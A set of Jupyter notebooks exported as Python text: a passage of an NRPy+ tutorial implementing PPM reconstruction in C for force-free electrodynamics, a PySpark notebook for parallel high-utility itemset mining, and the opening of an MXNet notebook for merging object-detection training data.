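For readers following along in Python, a rough analogue of this structure might look like the sketch below (for illustration only; the actual code uses the C++ struct above, and the name `GFAndGZ` is made up here).

```python
from dataclasses import dataclass, field
from typing import List

@dataclass
class GFAndGZ:
    """Hypothetical Python analogue of gf_and_gz_struct: the gridfunction
    data plus per-direction ghostzone counters (four entries because the
    C arrays are indexed 1..3 by direction, leaving index 0 unused)."""
    gf: List[float]
    gz_lo: List[int] = field(default_factory=lambda: [0, 0, 0, 0])
    gz_hi: List[int] = field(default_factory=lambda: [0, 0, 0, 0])

g = GFAndGZ(gf=[0.0, 1.0, 2.0])
```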
# <a id='reconstruction'></a>
#
# ## Step 1: The reconstruction function \[Back to [top](#toc)\]
# $$\label{reconstruction}$$
#
# <a id='define'></a>
#
# ### Step 1.a: Some definitions and declarations \[Back to [top](#toc)\]
# $$\label{define}$$
#
# This file contains the functions necessary for reconstruction. It is based on Colella & Woodward PPM in the case where pressure and density $P = \rho = 0$.
#
# We start by defining the values of `MINUS2`...`PLUS2` as $\{0, \ldots ,4\}$ for the sake of convenience later on; we also define `MAXNUMINDICES` as 5 so we can easily loop over the above. We include `loop_defines_reconstruction.h` for some macros that will allow us to conveniently write common loops that we will use (this will be imminently replaced with the NRPy+ standard `LOOP_REGION` **(Actually, might be better to directly port these)**) and give the function prototypes for our slope limiter, `slope_limit()`, and our monotonization algorithm, `monotonize()`.
# +
# %%writefile $outdir/reconstruct_set_of_prims_PPM_GRFFE.C
/*****************************************
* PPM Reconstruction Interface.
* Zacharia<NAME> (2013)
*
* This version of PPM implements the standard
* Colella & Woodward PPM, but in the GRFFE
* limit, where P=rho=0. Thus, e.g., ftilde=0.
*****************************************/
#define MINUS2 0
#define MINUS1 1
#define PLUS0 2
#define PLUS1 3
#define PLUS2 4
#define MAXNUMINDICES 5
// ^^^^^^^^^^^^^ Be _sure_ to define MAXNUMINDICES appropriately!
// You'll find the #define's for LOOP_DEFINE and SET_INDEX_ARRAYS inside:
#include "loop_defines_reconstruction.h"
static inline REAL slope_limit(const REAL dU,const REAL dUp1);
static inline void monotonize(const REAL U,REAL &Ur,REAL &Ul);
# -
# <a id='func'></a>
#
# ### Step 1.b: The function definition \[Back to [top](#toc)\]
# $$\label{func}$$
#
# Here, we start the function definition for the main function for our reconstruction, `reconstruct_set_of_prims_PPM_GRFFE()`. Among its parameters are the arrays that define the grid (that will need to be replaced with NRPy+ equivalents), a flux direction, the integer array specifying which primitives to reconstruct (as well as the number of primitives to reconstruct), the input structure `in_prims`, the output structures `out_prims_r` and `out_prims_l`, and a temporary array (this will be used to help switch variable names).
#
# We then check the number of ghostzones and error out if there are too few - this method requires three. Note the `for` loop here; it continues through the next two cells as well, looping over each primitive we will reconstruct in the chosen direction.
# +
# %%writefile -a $outdir/reconstruct_set_of_prims_PPM_GRFFE.C
static void reconstruct_set_of_prims_PPM_GRFFE(const cGH *cctkGH,const int *cctk_lsh,const int flux_dirn,const int num_prims_to_reconstruct,const int *which_prims_to_reconstruct,
const gf_and_gz_struct *in_prims,gf_and_gz_struct *out_prims_r,gf_and_gz_struct *out_prims_l, REAL *temporary) {
REAL U[MAXNUMVARS][MAXNUMINDICES],dU[MAXNUMVARS][MAXNUMINDICES],slope_lim_dU[MAXNUMVARS][MAXNUMINDICES],
Ur[MAXNUMVARS][MAXNUMINDICES],Ul[MAXNUMVARS][MAXNUMINDICES];
int ijkgz_lo_hi[4][2];
for(int ww=0;ww<num_prims_to_reconstruct;ww++) {
const int whichvar=which_prims_to_reconstruct[ww];
if(in_prims[whichvar].gz_lo[flux_dirn]!=0 || in_prims[whichvar].gz_hi[flux_dirn]!=0) {
CCTK_VError(VERR_DEF_PARAMS,"TOO MANY GZ'S! WHICHVAR=%d: %d %d %d : %d %d %d DIRECTION %d",whichvar,
in_prims[whichvar].gz_lo[1],in_prims[whichvar].gz_lo[2],in_prims[whichvar].gz_lo[3],
in_prims[whichvar].gz_hi[1],in_prims[whichvar].gz_hi[2],in_prims[whichvar].gz_hi[3],flux_dirn);
}
# -
# <a id='face'></a>
#
# ### Step 1.c: Interpolate the face values \[Back to [top](#toc)\]
# $$\label{face}$$
#
# In Loop 1, we will interpolate the face values at the left and right interfaces, `Ur` and `Ul`, respectively. This is done on a point-by-point basis as defined by the `LOOP_DEFINE`.
#
# After reading in the relevant values from memory, we calculate the simple `dU`:
# \begin{align}
# dU_{-1} &= U_{-1} - U_{-2} \\
# dU_{+0} &= U_{+0} - U_{-1} \\
# dU_{+1} &= U_{+1} - U_{+0} \\
# dU_{+2} &= U_{+2} - U_{+1}. \\
# \end{align}
# From that, we compute the slope-limited `slope_lim_dU`, or $\nabla U$ (see [below](#slope_limit)). Then, we compute the face values using eq. A1 of [arXiv:astro-ph/0503420](http://arxiv.org/pdf/astro-ph/0503420.pdf), adapted from eq. 1.9 of [Colella and Woodward (1984)](https://crd.lbl.gov/assets/pubs_presos/AMCS/ANAG/A141984.pdf):
# \begin{align}
# U_r &= \frac{1}{2} \left( U_{+1} + U_{+0} \right) + \frac{1}{6} \left( \nabla U_{+0} - \nabla U_{+1} \right) \\
# U_l &= \frac{1}{2} \left( U_{+0} + U_{-1} \right) + \frac{1}{6} \left( \nabla U_{-1} - \nabla U_{+0} \right). \\
# \end{align}
# (Note, however, that we use the standard coefficient $1/6$ instead of $1/8$.) Finally, we write the values to memory in the output structures.
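The two face-value formulas can be sketched directly in Python. This assumes the slope-limited slopes $\nabla U$ have already been computed; the helper name `face_values` is introduced here only for illustration.

```python
def face_values(Um1, U0, Up1, s_m1, s_0, s_p1):
    """Eq. A1 face values for the cell holding U0, given cell averages
    U_{-1}, U_{0}, U_{+1} and slope-limited slopes (nabla U)_{-1, 0, +1}.
    Returns (Ur, Ul) = (U(i+1/2), U(i-1/2))."""
    Ur = 0.5 * (Up1 + U0) + (1.0 / 6.0) * (s_0 - s_p1)
    Ul = 0.5 * (U0 + Um1) + (1.0 / 6.0) * (s_m1 - s_0)
    return Ur, Ul
```

For linear data the parabola reduces to the line itself: with cell averages 1, 2, 3 and unit slopes everywhere, the face values land exactly halfway between neighbors, `(2.5, 1.5)`.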
# %%writefile -a $outdir/reconstruct_set_of_prims_PPM_GRFFE.C
// *** LOOP 1: Interpolate to Ur and Ul, which are face values ***
// You will find that Ur depends on U at MINUS1,PLUS0, PLUS1,PLUS2, and
// Ul depends on U at MINUS2,MINUS1,PLUS0,PLUS1.
// However, we define the below loop from MINUS2 to PLUS2. Why not split
// this up and get additional points? Maybe we should. In GRMHD, the
// reason is that later on, Ur and Ul depend on ftilde, which is
// defined from MINUS2 to PLUS2, so we would lose those points anyway.
// But in GRFFE, ftilde is set to zero, so there may be a potential
// for boosting performance here.
LOOP_DEFINE(2,2, cctk_lsh,flux_dirn, ijkgz_lo_hi,in_prims[whichvar].gz_lo,in_prims[whichvar].gz_hi) {
SET_INDEX_ARRAYS(-2,2,flux_dirn);
/* *** LOOP 1a: READ INPUT *** */
// Read in a primitive at all gridpoints between m = MINUS2 & PLUS2, where m's direction is given by flux_dirn. Store to U.
for(int ii=MINUS2;ii<=PLUS2;ii++) U[whichvar][ii] = in_prims[whichvar].gf[index_arr[flux_dirn][ii]];
/* *** LOOP 1b: DO COMPUTATION *** */
/* First, compute simple dU = U(i) - U(i-1), where direction of i
* is given by flux_dirn, and U is a primitive variable:
* {vx,vy,vz,Bx,By,Bz}. */
// Note that for Ur and Ul at i, we must compute dU(i-1),dU(i),dU(i+1),
// and dU(i+2)
dU[whichvar][MINUS1] = U[whichvar][MINUS1]- U[whichvar][MINUS2];
dU[whichvar][PLUS0] = U[whichvar][PLUS0] - U[whichvar][MINUS1];
dU[whichvar][PLUS1] = U[whichvar][PLUS1] - U[whichvar][PLUS0];
dU[whichvar][PLUS2] = U[whichvar][PLUS2] - U[whichvar][PLUS1];
// Then, compute slope-limited dU, using MC slope limiter:
slope_lim_dU[whichvar][MINUS1]=slope_limit(dU[whichvar][MINUS1],dU[whichvar][PLUS0]);
slope_lim_dU[whichvar][PLUS0] =slope_limit(dU[whichvar][PLUS0], dU[whichvar][PLUS1]);
slope_lim_dU[whichvar][PLUS1] =slope_limit(dU[whichvar][PLUS1], dU[whichvar][PLUS2]);
// Finally, compute face values Ur and Ul based on the PPM prescription
// (Eq. A1 in http://arxiv.org/pdf/astro-ph/0503420.pdf, but using standard 1/6=(1.0/6.0) coefficient)
// Ur[PLUS0] represents U(i+1/2)
// We applied a simplification to the following line: Ur=U+0.5*(U(i+1)-U) + ... = 0.5*(U(i+1)+U) + ...
Ur[whichvar][PLUS0] = 0.5*(U[whichvar][PLUS1] + U[whichvar][PLUS0] ) + (1.0/6.0)*(slope_lim_dU[whichvar][PLUS0] - slope_lim_dU[whichvar][PLUS1]);
// Ul[PLUS0] represents U(i-1/2)
// We applied a simplification to the following line: Ul=U(i-1)+0.5*(U-U(i-1)) + ... = 0.5*(U+U(i-1)) + ...
Ul[whichvar][PLUS0] = 0.5*(U[whichvar][PLUS0] + U[whichvar][MINUS1]) + (1.0/6.0)*(slope_lim_dU[whichvar][MINUS1] - slope_lim_dU[whichvar][PLUS0]);
/* *** LOOP 1c: WRITE OUTPUT *** */
// Store right face values to {vxr,vyr,vzr,Bxr,Byr,Bzr},
// and left face values to {vxl,vyl,vzl,Bxl,Byl,Bzl}
out_prims_r[whichvar].gf[index_arr[flux_dirn][PLUS0]] = Ur[whichvar][PLUS0];
out_prims_l[whichvar].gf[index_arr[flux_dirn][PLUS0]] = Ul[whichvar][PLUS0];
}
# <a id='monotonize'></a>
#
# ### Step 1.d: Monotonize the values within each cell \[Back to [top](#toc)\]
# $$\label{monotonize}$$
#
# We skip Loop 2 in GRFFE; then, we flatten the data in Loop 3 (but since we flatten based on `ftilde_gf`, which is 0 in GRFFE, we again don't really do anything). Also in Loop 3, we call the `monotonize()` function on the face values. This function adjusts the face values to ensure that the data is monotonic within each cell to avoid the Gibbs phenomenon.
# %%writefile -a $outdir/reconstruct_set_of_prims_PPM_GRFFE.C
// *** LOOP 2 (REMOVED): STEEPEN RHOB. RHOB DOES NOT EXIST IN GRFFE EQUATIONS ***
}
// *** LOOP 3: FLATTEN BASED ON FTILDE AND MONOTONIZE ***
for(int ww=0;ww<num_prims_to_reconstruct;ww++) {
const int whichvar=which_prims_to_reconstruct[ww];
// ftilde() depends on P(MINUS2,MINUS1,PLUS1,PLUS2), THUS IS SET TO ZERO IN GRFFE
LOOP_DEFINE(2,2, cctk_lsh,flux_dirn, ijkgz_lo_hi,in_prims[whichvar].gz_lo,in_prims[whichvar].gz_hi) {
SET_INDEX_ARRAYS(0,0,flux_dirn);
U[whichvar][PLUS0] = in_prims[whichvar].gf[index_arr[flux_dirn][PLUS0]];
Ur[whichvar][PLUS0] = out_prims_r[whichvar].gf[index_arr[flux_dirn][PLUS0]];
Ul[whichvar][PLUS0] = out_prims_l[whichvar].gf[index_arr[flux_dirn][PLUS0]];
// ftilde_gf was computed in the function compute_ftilde_gf(), called before this routine
//REAL ftilde = ftilde_gf[index_arr[flux_dirn][PLUS0]];
// ...and then flatten (local operation)
Ur[whichvar][PLUS0] = Ur[whichvar][PLUS0];
Ul[whichvar][PLUS0] = Ul[whichvar][PLUS0];
// Then monotonize
monotonize(U[whichvar][PLUS0],Ur[whichvar][PLUS0],Ul[whichvar][PLUS0]);
out_prims_r[whichvar].gf[index_arr[flux_dirn][PLUS0]] = Ur[whichvar][PLUS0];
out_prims_l[whichvar].gf[index_arr[flux_dirn][PLUS0]] = Ul[whichvar][PLUS0];
}
// Note: ftilde=0 in GRFFE. Ur depends on ftilde, which depends on points of U between MINUS2 and PLUS2
out_prims_r[whichvar].gz_lo[flux_dirn]+=2;
out_prims_r[whichvar].gz_hi[flux_dirn]+=2;
// Note: ftilde=0 in GRFFE. Ul depends on ftilde, which depends on points of U between MINUS2 and PLUS2
out_prims_l[whichvar].gz_lo[flux_dirn]+=2;
out_prims_l[whichvar].gz_hi[flux_dirn]+=2;
}
# <a id='shift'></a>
#
# ### Step 1.e: Shift indices \[Back to [top](#toc)\]
# $$\label{shift}$$
#
# In Loop 4, we will shift the indices of `Ur` and `Ul`. So far, we have been concerned with the behavior of the data within a single cell. In that context, it makes sense to call the value of data at the left end of the cell `Ul` and the data at the right end of the cell `Ur`. However, going forward, we will be concerned with the behavior of the data at the interface between cells. In this context, it makes sense to call the value of data on the left of the interface (which is at the right end of the cell!) `Ul` and the data on the right of the interface `Ur`. So, using the array `temporary`, we switch the two names.
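A toy version of this relabeling, operating on hypothetical per-cell lists `Ur_old`/`Ul_old` rather than the real gridfunction arrays:

```python
def shift_faces(Ur_old, Ul_old):
    """Relabel cell-centered face values as interface-centered ones:
    at interface i-1/2, newUr(i) = oldUl(i)   (state just right of the interface),
                        newUl(i) = oldUr(i-1) (state just left of the interface).
    Entry 0 of newUl has no left neighbor, mirroring the lost ghostzone."""
    Ur_new = list(Ul_old)
    Ul_new = [None] + list(Ur_old[:-1])
    return Ur_new, Ul_new
```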
# +
# %%writefile -a $outdir/reconstruct_set_of_prims_PPM_GRFFE.C
// *** LOOP 4: SHIFT Ur AND Ul ***
/* Currently face values are set so that
* a) Ur(i) represents U(i+1/2), and
* b) Ul(i) represents U(i-1/2)
* Here, we shift so that the indices are consistent:
* a) U(i-1/2+epsilon) = oldUl(i) = newUr(i)
* b) U(i-1/2-epsilon) = oldUr(i-1) = newUl(i)
* Note that this step is not strictly necessary if you keep
* track of indices when computing the flux. */
for(int ww=0;ww<num_prims_to_reconstruct;ww++) {
const int whichvar=which_prims_to_reconstruct[ww];
LOOP_DEFINE(3,2, cctk_lsh,flux_dirn, ijkgz_lo_hi,in_prims[whichvar].gz_lo,in_prims[whichvar].gz_hi) {
SET_INDEX_ARRAYS(-1,0,flux_dirn);
temporary[index_arr[flux_dirn][PLUS0]] = out_prims_r[whichvar].gf[index_arr[flux_dirn][MINUS1]];
}
LOOP_DEFINE(3,2, cctk_lsh,flux_dirn, ijkgz_lo_hi,in_prims[whichvar].gz_lo,in_prims[whichvar].gz_hi) {
SET_INDEX_ARRAYS(0,0,flux_dirn);
// Then shift so that Ur represents the gridpoint at i-1/2+epsilon,
// and Ul represents the gridpoint at i-1/2-epsilon.
// Ur(i-1/2) = Ul(i-1/2) = U(i-1/2+epsilon)
// Ul(i-1/2) = Ur(i+1/2 - 1) = U(i-1/2-epsilon)
out_prims_r[whichvar].gf[index_arr[flux_dirn][PLUS0]] = out_prims_l[whichvar].gf[index_arr[flux_dirn][PLUS0]];
out_prims_l[whichvar].gf[index_arr[flux_dirn][PLUS0]] = temporary[index_arr[flux_dirn][PLUS0]];
}
// Ul was just shifted, so we lost another ghostzone.
out_prims_l[whichvar].gz_lo[flux_dirn]+=1;
out_prims_l[whichvar].gz_hi[flux_dirn]+=0;
// As for Ur, we didn't need to get rid of another ghostzone,
// but we did ... seems wasteful!
out_prims_r[whichvar].gz_lo[flux_dirn]+=1;
out_prims_r[whichvar].gz_hi[flux_dirn]+=0;
}
}
# -
# <a id='slope_limit'></a>
#
# ## Step 2: The slope limiter \[Back to [top](#toc)\]
# $$\label{slope_limit}$$
#
# The first function here implements the Monotonized Central (MC) reconstruction slope limiter:
# $$ MC(a,b) = \left \{ \begin{array}{ll}
# 0 & {\rm if\ } ab \leq 0 \\
# {\rm sign}(a) \min(2|a|,2|b|, |a+b|/2) & {\rm otherwise.}
# \end{array} \right.
# $$
#
# This is adapted from eq. 1.8 of [Colella and Woodward (1984)](https://crd.lbl.gov/assets/pubs_presos/AMCS/ANAG/A141984.pdf).
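A direct Python transcription of this limiter (mirroring the C `slope_limit()` below, including its branchless sign trick) might read:

```python
def slope_limit(dU, dUp1, coeff=2.0):
    """MC limiter for coeff=2.0; coeff=1.0 reduces it to minmod,
    matching the SLOPE_LIMITER_COEFF switch in the C code."""
    if dU * dUp1 > 0.0:
        delta_m_U = 0.5 * (dU + dUp1)                   # centered, second-order slope
        sign = (delta_m_U > 0.0) - (delta_m_U < 0.0)    # branchless sign, as in the C code
        return sign * min(abs(delta_m_U), coeff * abs(dU), coeff * abs(dUp1))
    return 0.0   # neighboring slopes disagree in sign: limit the slope to zero
```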
#
# +
# %%writefile -a $outdir/reconstruct_set_of_prims_PPM_GRFFE.C
// Set SLOPE_LIMITER_COEFF = 2.0 for MC, 1 for minmod
#define SLOPE_LIMITER_COEFF 2.0
//Eq. 60 in JOURNAL OF COMPUTATIONAL PHYSICS 123, 1-14 (1996)
// [note the factor of 2 missing in the |a_{j+1} - a_{j}| term].
// Recall that dU = U_{i} - U_{i-1}.
static inline REAL slope_limit(const REAL dU,const REAL dUp1) {
if(dU*dUp1 > 0.0) {
//delta_m_U=0.5 * [ (u_(i+1)-u_i) + (u_i-u_(i-1)) ] = (u_(i+1) - u_(i-1))/2 <-- first derivative, second-order; this should happen most of the time (smooth flows)
const REAL delta_m_U = 0.5*(dU + dUp1);
// EXPLANATION OF BELOW LINE OF CODE.
// In short, sign_delta_a_j = sign(delta_m_U) = (0.0 < delta_m_U) - (delta_m_U < 0.0).
// If delta_m_U>0, then (0.0 < delta_m_U)==1, and (delta_m_U < 0.0)==0, so sign_delta_a_j=+1
// If delta_m_U<0, then (0.0 < delta_m_U)==0, and (delta_m_U < 0.0)==1, so sign_delta_a_j=-1
// If delta_m_U==0,then (0.0 < delta_m_U)==0, and (delta_m_U < 0.0)==0, so sign_delta_a_j=0
const int sign_delta_m_U = (0.0 < delta_m_U) - (delta_m_U < 0.0);
//Decide whether to use 2nd order derivative or first-order derivative, limiting slope.
return sign_delta_m_U*MIN(fabs(delta_m_U),MIN(SLOPE_LIMITER_COEFF*fabs(dUp1),SLOPE_LIMITER_COEFF*fabs(dU)));
}
return 0.0;
}
# -
# <a id='monotonize_def'></a>
#
# ## Step 3: The monotonization algorithm \[Back to [top](#toc)\]
# $$\label{monotonize_def}$$
#
# The next function monotonizes the slopes using the algorithm from [Colella and Woodward (1984)](https://crd.lbl.gov/assets/pubs_presos/AMCS/ANAG/A141984.pdf), eq. 1.10. We want the slope to be monotonic within a cell in order to reduce the impact of the Gibbs phenomenon. So, we consider three values in the cell: the cell average, `U`; the value on the left interface of the cell, `Ul`; and the value on the right interface of the cell, `Ur`. The goal of the algorithm is to ensure monotonicity; so, it first checks whether the cell contains a local extremum. If it does, we make the interpolation function a constant. We must then also consider the case where `U` is "close" to `Ur` or `Ul`, so that an interpolating polynomial between them would not be monotonic over the cell. So, the basic algorithm is as follows:
#
# * `dU = Ur - Ul`
# * `mU = 0.5*(Ur+Ul)`.
# * If the cell has an extremum:
# * `Ur = U`
# * `Ul = U`
# * If `U` is too close to `Ul`
# * Move `Ul` farther away
# * If `U` is too close to `Ur`
# * Move `Ur` farther away
#
# More rigorous definitions of "Too Close" and "Farther Away" are derived from parabolas with vertices on the interfaces, as can be seen in the code below:
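A Python sketch of the same monotonization logic, returning the adjusted pair instead of mutating C++ references:

```python
def monotonize(U, Ur, Ul):
    """Colella & Woodward eq. 1.10; returns the adjusted (Ur, Ul)."""
    dU = Ur - Ul
    mU = 0.5 * (Ur + Ul)
    if (Ur - U) * (U - Ul) <= 0.0:
        return U, U                         # local extremum: flatten to a constant
    if dU * (U - mU) > (1.0 / 6.0) * dU**2:
        return Ur, 3.0 * U - 2.0 * Ur       # U too close to Ur: move Ul farther away
    if dU * (U - mU) < -(1.0 / 6.0) * dU**2:
        return 3.0 * U - 2.0 * Ul, Ul       # U too close to Ul: move Ur farther away
    return Ur, Ul                           # already monotone: leave unchanged
```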
# +
# %%writefile -a $outdir/reconstruct_set_of_prims_PPM_GRFFE.C
static inline void monotonize(const REAL U,REAL &Ur,REAL &Ul) {
const REAL dU = Ur - Ul;
const REAL mU = 0.5*(Ur+Ul);
if ( (Ur-U)*(U-Ul) <= 0.0) {
Ur = U;
Ul = U;
return;
}
if ( dU*(U-mU) > (1.0/6.0)*SQR(dU)) {
Ul = 3.0*U - 2.0*Ur;
return;
}
if ( dU*(U-mU) < -(1.0/6.0)*SQR(dU)) {
Ur = 3.0*U - 2.0*Ul;
return;
}
}
# -
# <a id='latex_pdf_output'></a>
#
# # Step 4: Output this notebook to $\LaTeX$-formatted PDF file \[Back to [top](#toc)\]
# $$\label{latex_pdf_output}$$
#
# The following code cell converts this Jupyter notebook into a proper, clickable $\LaTeX$-formatted PDF file. After the cell is successfully run, the generated PDF may be found in the root NRPy+ tutorial directory, with filename
# [Tutorial-GiRaFFE_HO_Ccode_library-PPM.pdf](Tutorial-GiRaFFE_HO_Ccode_library-PPM.pdf) (Note that clicking on this link may not work; you may need to open the PDF file through another means.)
# !jupyter nbconvert --to latex --template latex_nrpy_style.tplx Tutorial-GiRaFFE_HO_Ccode_library-PPM.ipynb
# !pdflatex -interaction=batchmode Tutorial-GiRaFFE_HO_Ccode_library-PPM.tex
# !pdflatex -interaction=batchmode Tutorial-GiRaFFE_HO_Ccode_library-PPM.tex
# !pdflatex -interaction=batchmode Tutorial-GiRaFFE_HO_Ccode_library-PPM.tex
# !rm -f Tut*.out Tut*.aux Tut*.log
|
notebook/Tutorial-GiRaFFE_HO_Ccode_library-PPM.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
from pyspark import SparkContext, SparkConf
from collections import defaultdict
from Transaction import Transaction
from operator import add
from pEFIM import pEFIM
# variables used in the algorithm
APP_NAME = "PEFIM"
conf = SparkConf().setAppName(APP_NAME)
sc = SparkContext(conf=conf)
inputfile = 'thesisDatabase.txt'
numPartitions = 4
minUtil = 50
partitionType = 'lookup'
def buildTransaction(line):
    # takes an input line and builds a transaction from it
line = line.strip().split(':')
items = line[0].strip().split(' ')
items = [int(item) for item in items]
twu = float(line[1])
utilities = line[2].strip().split(' ')
utilities = [float(utility) for utility in utilities]
# creating a transaction
transaction = Transaction(items, utilities, twu)
return transaction
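For reference, the input layout this function assumes appears to be `items : twu : utilities`, colon-separated. A hypothetical sample line (the values here are made up) parses as follows:

```python
# Hypothetical line in the assumed 'items : twu : utilities' layout
sample = '1 3 5:20:4.0 6.0 10.0'
items_part, twu_part, util_part = [p.strip() for p in sample.strip().split(':')]
items = [int(item) for item in items_part.split(' ')]       # purchased items
twu = float(twu_part)                                       # transaction utility
utilities = [float(u) for u in util_part.split(' ')]        # per-item utilities
```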
def getFileStats(transactions):
transactionUtilities = transactions.flatMap(lambda x: [x.getTransactionUtility()])
totalutility = transactionUtilities.reduce(add)
datasetLen = len(transactionUtilities.collect())
return {
'len' : datasetLen,
'totalUtility' : totalutility
}
# this function not only revises the transaction but also calculates the NSTU value of each secondary item
def reviseTransactions(transaction):
transaction.removeUnpromisingItems(oldNamesToNewNames_broadcast.value)
return transaction
# calculates the subtree utility of secondary items
def calculateSTUFirstTime(transaction):
# secondary items
secondaryItems = list(oldNamesToNewNames_broadcast.value.keys())
items = transaction.getItems()
utilities = transaction.getUtilities()
itemsUtilityList = []
sumSU = 0
i = len(items) - 1
while i >= 0:
item = items[i]
sumSU += utilities[i]
itemsUtilityList.append((item, sumSU))
i -= 1
return itemsUtilityList
# this function just collects the transaction and prints the items and utilities present in the transaction
def printTransactions(transactions):
for transaction in transactions.collect():
print('transaction start')
print(transaction.getItems())
print(transaction.getUtilities())
print('transaction ends')
# divides the items between the partitions based on certain techniques
def divideItems(items, numPartitions, partitionType):
itemNode = {}
NodeToItemMap = {}
for i in range(numPartitions):
NodeToItemMap[i] = []
if partitionType == 'lookup':
i = 0
inc = 1
flag = False
for item in items:
itemNode[item] = i
NodeToItemMap[i].append(item)
i += inc
if (i == 0) or (i == numPartitions -1):
if flag:
if i == 0:
inc = 1
else:
inc = -1
flag = False
else:
inc = 0
flag = True
for i in range(numPartitions):
NodeToItemMap[i] = set(NodeToItemMap[i])
return itemNode, NodeToItemMap
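The `'lookup'` branch deals items to partitions in a boustrophedon (back-and-forth) order, pausing once at each endpoint, so every partition receives a balanced mix of low- and high-utility items. A compact re-implementation showing just the assignment pattern (a sketch for illustration, not the Spark code path):

```python
def zigzag_assign(items, num_partitions):
    """Same walk as the 'lookup' branch above: sweep the partition ids
    forward and back, repeating each endpoint once before turning around."""
    node, inc, flag = 0, 1, False
    assignment = {}
    for item in items:
        assignment[item] = node
        node += inc
        if node in (0, num_partitions - 1):
            if flag:
                inc = 1 if node == 0 else -1   # turn around at the endpoint
                flag = False
            else:
                inc, flag = 0, True            # pause at the endpoint once

    return assignment

assignment = zigzag_assign(range(9), 4)
order = [assignment[k] for k in range(9)]
# order == [0, 1, 2, 3, 3, 2, 1, 0, 0]
```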
# +
def defaultBooleanValue():
return False
def mapTransaction(transaction):
items = transaction.getItems()
utilities = transaction.getUtilities()
totalUtility = transaction.getTransactionUtility()
mapItemToNodeID = itemToNodeMap_broadcast.value
mapNodeID = defaultdict(defaultBooleanValue)
transactionList = []
cumulativeUtility = 0
primaryItems = list(mapItemToNodeID.keys())
for idx, item in enumerate(items):
if item not in primaryItems:
cumulativeUtility += utilities[idx]
continue
nodeID = mapItemToNodeID[item]
# if this transaction is not assigned to the node
if not mapNodeID[nodeID]:
# create a new transaction
newTransaction = Transaction(items[idx:], utilities[idx:], totalUtility - cumulativeUtility)
transactionList.append((nodeID, newTransaction))
mapNodeID[nodeID] = True
cumulativeUtility += utilities[idx]
return transactionList
# +
# reading the data from the text file and transforming each line into a transaction
transactions = sc.textFile(inputfile, numPartitions).map(lambda x : buildTransaction(x))
transactions.persist()
# compute the statistics of the database
filestats = getFileStats(transactions)
# calculate the TWU value for each item present in the database
twuDict = dict(transactions.flatMap(lambda x: [(item, x.getTransactionUtility()) for item in x.getItems()]).reduceByKey(add).filter(lambda x: x[1] >= minUtil).collect())
# the keys of this dictionary are the items we keep in the database; we call them secondary items
secondaryItems = list(twuDict.keys())
# sorting the secondary items in increasing order of their TWU values
secondaryItems.sort(key = lambda x: twuDict[x])
# give new names to the items based upon their ordering starting from 1
oldNamesToNewNames = {} # dictionary for storing the mappings from old names to new names
newNamesToOldNames = {} # dictionary to map from new names to old names
currentName = 1
for idx, item in enumerate(secondaryItems):
oldNamesToNewNames[item] = currentName
newNamesToOldNames[currentName] = item
secondaryItems[idx] = currentName
currentName += 1
# broadcasting the oldNamesToNewNames Dictionary which will be used by the transaction to get the revised transaction
oldNamesToNewNames_broadcast = sc.broadcast(oldNamesToNewNames)
newNamesToOldNames_broadcast = sc.broadcast(newNamesToOldNames)
minUtil_broadcast = sc.broadcast(minUtil)
# Remove non secondary items from each transaction and sort remaining items in increasing order of their TWU values
revisedTransactions = transactions.map(reviseTransactions).filter(lambda x: len(x.getItems()) > 0)
revisedTransactions.persist()
transactions.unpersist()
# Calculate the subtree utility of each item in secondary item
STU_dict = dict(revisedTransactions.flatMap(calculateSTUFirstTime).reduceByKey(add).filter(lambda x: x[1] >= minUtil).collect())
# primary items or the items which need to be projected in DFS traversal of the search space
primaryItems = list(STU_dict.keys())
primaryItems.sort(key= lambda x: twuDict[newNamesToOldNames[x]])
itemToNodeMap, nodeToItemsMap = divideItems(primaryItems, numPartitions, partitionType)
itemToNodeMap_broadcast = sc.broadcast(itemToNodeMap)
nodeToItemsMap_broadcast = sc.broadcast(dict(nodeToItemsMap))
# creating a new key-value RDD where key is node id and value is list of transactions at that node id
partitionTransactions = revisedTransactions.flatMap(mapTransaction).groupByKey().mapValues(list)
partitionTransactions.persist()
revisedTransactions.unpersist()
# repartition the data into nodes depending upon the key
# # transactions = transactions.partitionBy(numPartitions, lambda k: int(k[0]))
# # partitioner = RangePartitioner(numPartitions)
# +
def parllelEFIM(nodeData):
currNode = nodeData[0]
transactions = nodeData[1]
primaryItems = nodeToItemsMap_broadcast.value
primaryItems = primaryItems[currNode]
minUtil = minUtil_broadcast.value
oldNamesToNewNames = oldNamesToNewNames_broadcast.value
newNamesToOldNames = newNamesToOldNames_broadcast.value
secondaryItems = list(newNamesToOldNames.keys())
pefim = pEFIM(minUtil, primaryItems, secondaryItems, transactions, newNamesToOldNames, oldNamesToNewNames)
output = pefim.runAlgo()
return output
def output(itemsets, file):
with open(file, 'w') as f:
for itemset in itemsets:
f.write("itemset : " + str(itemset[1]))
f.write(" utility : " + str(itemset[0]))
f.write("\n")
# +
# for idx, transaction in enumerate(partitionTransactions.collect()):
# if idx == 1:
# parllelEFIM(transaction)
huis = partitionTransactions.map(parllelEFIM).groupByKey().map(lambda x : (x[0], list(x[1]))).collect()
# -
itemsets = [y for x in huis[0][1] if len(x) > 0 for y in x]
print(len(itemsets))
output(itemsets, 'out.txt')
|
mainEFIM.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: conda_mxnet_p36
# language: python
# name: conda_mxnet_p36
# ---
# # Augment the training data (images plus lst-format metadata) and convert it to RecordIO files
# ## Install the required modules
# !pip install imgaug tqdm
# ## Merge multiple sets of training data
#
# Merge multiple lst files and image files.
# While merging, resize each image to fit within a square of the specified size.
# The lst files are assumed to follow [mxnet's object-detection format](https://mxnet.incubator.apache.org/api/python/image/image.html) (header size 2, 5 values per label, no extra header).
#
# +
# Paths to the lst files
lst_path_list = ['path/to/lst1', 'path/to/lst2']
# Locations of the image files (in the same order as lst_path_list)
img_root_path_list = ['path/to/lst1', 'path/to/lst2']
# Output root for the merged lst file and images
merged_root_path = './data/merged'
# Image size (after conversion: img_edge_size * img_edge_size)
img_edge_size = 512
# -
# ### Function definitions
#
# +
def create_lst(file_path, index, label_data):
    """
    Build one lst-format record (a tab-separated string)
    """
    header_size = 2
    label_width = 5
    return '\t'.join([
        str(index),
        str(header_size),
        str(label_width),
        '\t'.join(label_data),
        file_path])
